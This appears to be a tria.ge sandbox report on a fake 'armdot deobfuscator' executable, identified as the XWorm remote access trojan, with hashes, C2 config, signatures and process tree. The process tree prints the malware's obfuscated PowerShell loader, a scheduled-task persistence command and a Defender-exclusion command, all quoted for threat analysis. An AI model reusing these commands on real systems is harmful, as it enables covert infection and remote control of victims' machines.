Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

armdot deo...or.exe

windows10-2004-x64

10

Resubmissions

09/09/2024, 19:32

240909-x89t5axhkh 10

09/09/2024, 19:31

240909-x8rzbaxgre 8

Analysis

  • max time kernel
    15s
  • max time network
    15s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/09/2024, 19:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    armdot deobfuscator.exe

  • Size

    275KB

  • MD5

    2bce10bc9bf1c5e013965c7a60deae05

  • SHA1

    7efa1765b1842f4ce9e746c26c7d8394ad7820ce

  • SHA256

    5e74f08923fec3a5daf99b9a6c0763b21a98226f90c537235408a4258389ca01

  • SHA512

    fbfadeb3f983cc76478864de82952ce34cb7543743a3421151827c5a8226d24ddff2409f71230dfc4bbfad441cea9a148a11a31c16e3890cd5a0797fe4a9e7c0

  • SSDEEP

    6144:IwDHUsnM9rwQCz8vRtKT2OyD0Ek+c9NWtO5MxRxLJcNfZ:IAjMnZtgbyD0wyWtOcJeZ

Score
10/10
xwormdiscoveryexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:41594

internal-bachelor.gl.at.ply.gg:41594
Mutex

JgIYtyxyvTKZt7Bf

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    svchost.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\armdot deobfuscator.exe
    "C:\Users\Admin\AppData\Local\Temp\armdot deobfuscator.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3612
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\crypt2.bat" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2184
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wIalkQRXMjI6os9KK3k7hlFrDQkHj2XVm7J3WOd1/SA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e6ZRtmDqjWQoNwY5EpOeNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FqaIW=New-Object System.IO.MemoryStream(,$param_var); $iUhow=New-Object System.IO.MemoryStream; $lErRr=New-Object System.IO.Compression.GZipStream($FqaIW, [IO.Compression.CompressionMode]::Decompress); $lErRr.CopyTo($iUhow); $lErRr.Dispose(); $FqaIW.Dispose(); $iUhow.Dispose(); $iUhow.ToArray();}function execute_function($param_var,$param2_var){ $imtyS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PkVgO=$imtyS.EntryPoint; $PkVgO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\crypt2.bat';$CZdgQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\crypt2.bat').Split([Environment]::NewLine);foreach ($eeotO in $CZdgQ) { if ($eeotO.StartsWith(':: ')) { $Hwsqs=$eeotO.Substring(3); break; }}$payloads_var=[string[]]$Hwsqs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2488
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_561_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_561.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1520
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_561.vbs"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3436
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_561.bat" "
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3988
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wIalkQRXMjI6os9KK3k7hlFrDQkHj2XVm7J3WOd1/SA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e6ZRtmDqjWQoNwY5EpOeNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FqaIW=New-Object System.IO.MemoryStream(,$param_var); $iUhow=New-Object System.IO.MemoryStream; $lErRr=New-Object System.IO.Compression.GZipStream($FqaIW, [IO.Compression.CompressionMode]::Decompress); $lErRr.CopyTo($iUhow); $lErRr.Dispose(); $FqaIW.Dispose(); $iUhow.Dispose(); $iUhow.ToArray();}function execute_function($param_var,$param2_var){ $imtyS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PkVgO=$imtyS.EntryPoint; $PkVgO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_561.bat';$CZdgQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_561.bat').Split([Environment]::NewLine);foreach ($eeotO in $CZdgQ) { if ($eeotO.StartsWith(':: ')) { $Hwsqs=$eeotO.Substring(3); break; }}$payloads_var=[string[]]$Hwsqs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3512
              • C:\Users\Admin\AppData\Local\Temp\cmd.exe
                "C:\Users\Admin\AppData\Local\Temp\cmd.exe"
                7⤵
                • Executes dropped EXE
                PID:688
              • C:\Users\Admin\AppData\Local\Temp\Armdot Deobf.exe
                "C:\Users\Admin\AppData\Local\Temp\Armdot Deobf.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2744
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 1048
                  8⤵
                  • Program crash
                  PID:3020
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                PID:2928
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2744 -ip 2744
    1⤵
      PID:436

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      55d32bc1c206428fe659912b361362de

      SHA1

      7056271e5cf73b03bafc4e616a0bc5a4cffc810f

      SHA256

      37bd9078411576470f38bed628682d66786194692355541cd16f323e8f17c1ff

      SHA512

      2602abc70c0ed7e5ba63a3c7190015c2b30aa3223fbbe65fd9ddc001e84ab393bb172a9488dd988cd6368d668ab8608f85dc03cdb7c9561e904e3f7ce103485c

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      18KB

      MD5

      15847e7f4e4872fc20cf1cd78147d243

      SHA1

      a460b8eb4ce63de7dd0ed89531bbf598dd0401ce

      SHA256

      817c30e75a7263b5e388d654e983647da7015ef45d70cd0a248d1a745be40662

      SHA512

      e5a2344b39e7ef258925140d15efa71d5ae9887b5dec14e9c3d5085f6359f0cd14eb02e3768911a8c7ca5d45f2711da667db7d9f17d825fb0950d7c4d88c8fa6

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Armdot Deobf.exe
      Filesize

      22KB

      MD5

      e949a85cefc515f6d281a64a322e575a

      SHA1

      05cbb24ee6b77d47ed6b839d446d60c8bc9ffe83

      SHA256

      66ae316114440dc776171193df2af2ce768a3da53b84759ad72209d3ecd73274

      SHA512

      a4a047bbbe8383601db9bfe0b6390559032ba475ce8bb6790720c18b1577c4bd7831f68d69fac6f14721d651d84316d740ef0dc58a2ba34f31870ba9957193f0

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q5mdys0l.q0c.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\cmd.exe
      Filesize

      316KB

      MD5

      428cec6b0034e0f183eb5bae887be480

      SHA1

      7140caf2a73676d1f7cd5e8529db861f4704c939

      SHA256

      3f6aa206177bebb29fc534c587a246e0f395941640f3f266c80743af95a02150

      SHA512

      509b8c138c4928524b4830488a96bd7e4bc7db2c494b10c68e1edcf7d901879126168eaa6635818d29734540f8400e376e5716a3b4dc052cba4e267bbaad7253

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\crypt2.bat
      Filesize

      270KB

      MD5

      3ea84c5d84c23aa2336ad19120ca2f69

      SHA1

      89f8c3ce7dff799df989d77b0589faeacf29577a

      SHA256

      c96331a38563d38ce6ae9f99294c0b39a595275cfdaf1ea85f91f693a7c302e6

      SHA512

      6aa2bf0d81b3fc103333e242492724dbfb45acb7ca5fd3289360bb7cff09d0bd524537570bc353f7ca92fb2e064aacdd3ee7e0a2fa4259b12056301050b8000f

      Download Submit

    • C:\Users\Admin\AppData\Roaming\startup_str_561.vbs
      Filesize

      115B

      MD5

      2bbe377fb7d706a939087c8339b0bceb

      SHA1

      9242a0b34d9176dfd89d57a590769dc76824b102

      SHA256

      d79183b2822d1237f9cad58962fa434ae7d1caa5e1c55c3fe8d95bbc4f1ffe2e

      SHA512

      dca353a627d3c59f25114fd7387e966e81b941e0649e7f41b8aa21e106bb522b1dde265f00ad76205eb4fc979576461c293140859205762e850e6933aad356da

      Download Submit

    • memory/1520-41-0x00000000072E0000-0x0000000007312000-memory.dmp

      Filesize

      200KB

      Download

    • memory/1520-30-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/1520-59-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/1520-56-0x0000000007690000-0x00000000076A1000-memory.dmp

      Filesize

      68KB

      Download

    • memory/1520-55-0x0000000007710000-0x00000000077A6000-memory.dmp

      Filesize

      600KB

      Download

    • memory/1520-54-0x0000000007500000-0x000000000750A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/1520-53-0x0000000007350000-0x00000000073F3000-memory.dmp

      Filesize

      652KB

      Download

    • memory/1520-52-0x0000000007320000-0x000000000733E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/1520-42-0x0000000070E30000-0x0000000070E7C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/1520-31-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2488-27-0x00000000074E0000-0x0000000007542000-memory.dmp

      Filesize

      392KB

      Download

    • memory/2488-6-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2488-11-0x0000000005DF0000-0x0000000005E56000-memory.dmp

      Filesize

      408KB

      Download

    • memory/2488-9-0x0000000005520000-0x0000000005542000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2488-26-0x00000000068D0000-0x00000000068D8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2488-25-0x00000000068A0000-0x00000000068BA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/2488-24-0x0000000007B20000-0x000000000819A000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/2488-23-0x0000000006320000-0x000000000636C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/2488-22-0x00000000062D0000-0x00000000062EE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/2488-21-0x0000000005E60000-0x00000000061B4000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/2488-10-0x0000000005D10000-0x0000000005D76000-memory.dmp

      Filesize

      408KB

      Download

    • memory/2488-7-0x0000000005570000-0x0000000005B98000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/2488-8-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2488-28-0x00000000081A0000-0x0000000008744000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/2488-68-0x000000007501E000-0x000000007501F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2488-69-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2488-80-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2488-4-0x000000007501E000-0x000000007501F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2488-5-0x0000000004E00000-0x0000000004E36000-memory.dmp

      Filesize

      216KB

      Download

    • memory/2744-107-0x0000000000930000-0x000000000093C000-memory.dmp

      Filesize

      48KB

      Download

    • memory/2744-108-0x0000000005260000-0x00000000052F2000-memory.dmp

      Filesize

      584KB

      Download

    • memory/2744-109-0x0000000005200000-0x000000000520A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/3512-87-0x0000000007920000-0x00000000079BC000-memory.dmp

      Filesize

      624KB

      Download

    • memory/3512-86-0x0000000007460000-0x0000000007470000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3512-81-0x0000000005FB0000-0x0000000006012000-memory.dmp

      Filesize

      392KB

      Download